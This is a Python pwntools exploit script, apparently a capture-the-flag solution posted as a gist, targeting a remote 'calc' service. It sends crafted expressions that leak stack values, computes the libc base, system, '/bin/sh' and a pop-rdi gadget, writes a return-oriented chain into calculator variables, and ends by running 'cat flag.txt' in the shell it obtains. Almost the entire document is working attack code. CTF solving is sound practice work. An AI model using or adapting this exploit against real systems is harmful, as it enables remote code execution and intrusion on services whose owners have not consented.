| #!/usr/bin/env python | |
| from pwn import * | |
| import struct | |
| #r = remote('127.0.0.1', 1337) | |
| r = remote('h4x.0x04.net', 2137) | |
| #r = process(['./calc'], env={'LD_LIBRARY_PATH': '.'}) | |
| context.terminal = ['termite', '-e'] | |
| def int_to_double(val): | |
| return struct.unpack('d', struct.pack('Q', val))[0] | |
| def readstack(n, read=True): | |
| reps = 31 + n | |
| cvar = chr(ord('a') + n) | |
| payload = f'{cvar}={"(" * reps}+{")" * (n+7)}' | |
| if n > 0: | |
| beg = n | |
| payload += f'+0*{"(" * beg}0+{")+".join([chr(ord("a") + i) for i in range(n)][::-1])}{")" * (beg - n + 1)}' | |
| payload += ')' * (reps - (n+7)) | |
| if len(payload) > 1023: | |
| print('PAYLOAD TOO BIG') | |
| print('payload:', payload) | |
| r.sendline(payload) | |
| if(read): | |
| r.sendline(cvar) | |
| val_str = r.recvline().strip().decode() | |
| val = float(val_str) | |
| packed = struct.pack('d', val) | |
| assert(len(packed) == 8) | |
| return struct.unpack('Q', packed)[0], val_str | |
| #gdb.attach(r, gdbscript=open('gdbscript.py')) | |
| stack = [] | |
| for i in range(0, 8): | |
| val, val_str = readstack(i) | |
| print(f'stack[{i}] = {hex(val)} (str={val_str})') | |
| stack.append(val) | |
| libc_start_main = stack[7] - 242 | |
| libc_addr = libc_start_main - 0x28060 | |
| libc_system = libc_addr + 0x4a830 | |
| libc_bin_sh = libc_addr + 0x18de78 | |
| main_addr = stack[3] - 125 | |
| exec_addr = main_addr - 0x1b5e | |
| pop_rdi = exec_addr + 0x1c73 | |
| payload = f'd={int_to_double(pop_rdi)}' | |
| print(payload) | |
| r.sendline(payload) | |
| payload = f'e={int_to_double(libc_bin_sh)}' | |
| print(payload) | |
| r.sendline(payload) | |
| payload = f'f={int_to_double(libc_system)}' | |
| print(payload) | |
| r.sendline(payload) | |
| readstack(6, read=False) | |
| r.sendline('cat flag.txt') | |
| print(r.readline().decode().strip()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment